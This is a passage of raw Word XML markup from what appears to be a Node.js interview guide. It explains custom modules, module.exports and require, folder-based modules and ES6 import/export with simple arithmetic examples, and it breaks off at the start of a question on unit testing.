        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>To create a custom module, you need to write your code in a separate file and export the necessary functions, objects, or variables so that they can be used in other parts of your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6957410E"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example: Creating a math.js module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748D94C9"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math.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7691DF19"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add(a, b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5528BA7E"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a + b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168749B8"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F23D86E"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7D32E3D3"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subtract(a, b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245B1D20"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a - b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567917AF"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E8E8437"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C73248C"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Export the functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284DDE5C"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module.exports = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E583E8C"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add,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A645382"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subtract</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E4631D"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5BB34EB" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C2983" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2. Using a Custom Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E9C5A1" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C2983" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>To use a custom module in another file, you need to import it using the require function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184F9C6A"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example: Using the math.js module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190E6C5D" w14:textId="4D212178" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C298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app.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595FFAAF" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C298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math = require('./math');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5220EFAD" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C298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p>
    <w:p w14:paraId="5497B376" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C298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sum = math.add(5, 10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACC9A1F" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C298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const difference = math.subtract(10, 5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76417272" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C298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p>
    <w:p w14:paraId="47D081CA" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C298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console.log(`Sum: ${sum}`);          // Output: Sum: 15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250FFE52" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C298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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>console.log(`Difference: ${difference}`); // Output: Difference: 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719C64C1" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C2983" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3. Exporting and Importing with module.exports and require</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D23F92" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C2983" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>module.exports:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Used to export functions, objects, or variables from a module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DD7676" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C2983" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>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 xml:space="preserve"> Used to import a module and gain access to the exported properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06169670"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>You can export multiple functions or objects as an object (as shown above), or you can export a single function or object directly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CED364C"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greet.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4348E185"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greet(name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0071F9"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`Hello, ${name}!`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5221424F"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0F9BD45"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7DEE179"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module.exports = greet;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1861C3"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app.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256B451E"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greet = require('./greet');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F474A1F"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console.log(greet('World'));  // Output: Hello, World!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF33FE9" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C2983" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4. Organizing Modules with Folders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE78D68" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C2983" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>You can organize your modules into folders. If you have multiple related modules, you can create a directory and add an index.js file to act as an entry point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5028BEB9"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example: Folder structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433EFE4E"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/utils</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AEBFC4"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  |-- math.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FF9C57"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  |-- string.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1DA327"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  |-- index.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3508D813"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>index.js:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AA8AD1"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math = require('./math');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799C35EF"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string = require('./string');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CE12FF"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4BBC689"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module.exports = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BC4007"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math,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF1003F"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string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA3311A"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19F9677"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Using the organized modules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D5AADF"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app.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E08E67C"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utils = require('./utils');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567EE2BC"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CCD2F45"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console.log(utils.math.add(2, 3));         // Output: 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469B5643"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console.log(utils.string.toUpperCase('abc')); // Example output from string module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50492D45" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C2983" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5. Using Third-Party Modules from npm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225A7D3F" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C2983" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In addition to custom modules, you can also use third-party modules from npm. These are installed via the command line using npm install &lt;module-name&gt; and are then required like any custom module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048390D0" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C2983" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6. Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46573482" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C2983" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Encapsulation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Keep related functions and logic together in a module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A863ADE" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C2983" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Reusability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Design modules to be reusable across different parts of your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8D0FBF" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C2983" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Naming:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use meaningful names for your modules and files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A1D59A" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C2983" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Documentation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Document your module’s functionality for easier usage and maintenance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8C25CC" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C2983" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7. Example with ES6 import and export (Node.js 14+ with "type": "module" in package.json)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A92ED6F" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C2983" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>With ES6 modules, you can use import and export instead of require and module.exports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AB96F6"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03D57A4A"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math.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC12CD8"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export function add(a, b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E22AA5"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a + b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8ABD0E"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8839602"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B1E8EFC"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export function subtract(a, b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E604598"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a - b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5AAF37"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8008009" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C2983" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Using the ES6 module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B83BDED"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app.mjs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5819E285"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import { add, subtract } from './math.mjs';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7413F5B5"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CC62873"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console.log(add(3, 4));  // Output: 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190A9BD2" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C298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console.log(subtract(9, 5)); // Output: 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D72327" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C2983" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FD0FB98"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30" w:name="_Toc178383213"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q29. How do you perform unit testing in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="078D2F37" w14:textId="77777777" w:rsidR="003D2016" w:rsidRPr="00DA2F32" w:rsidRDefault="003D2016" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1. Understanding Unit Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E58FF96" w14:textId="77777777" w:rsidR="003D2016" w:rsidRPr="00DA2F32" w:rsidRDefault="003D2016" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Unit Testing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> The process of testing individual functions or components in isolation to ensure they behave as intended.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47520215" w14:textId="77777777" w:rsidR="003D2016" w:rsidRPr="00DA2F32" w:rsidRDefault="003D2016" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Test Frameworks:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> In Node.js, popular frameworks like </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Mocha</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Jest</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
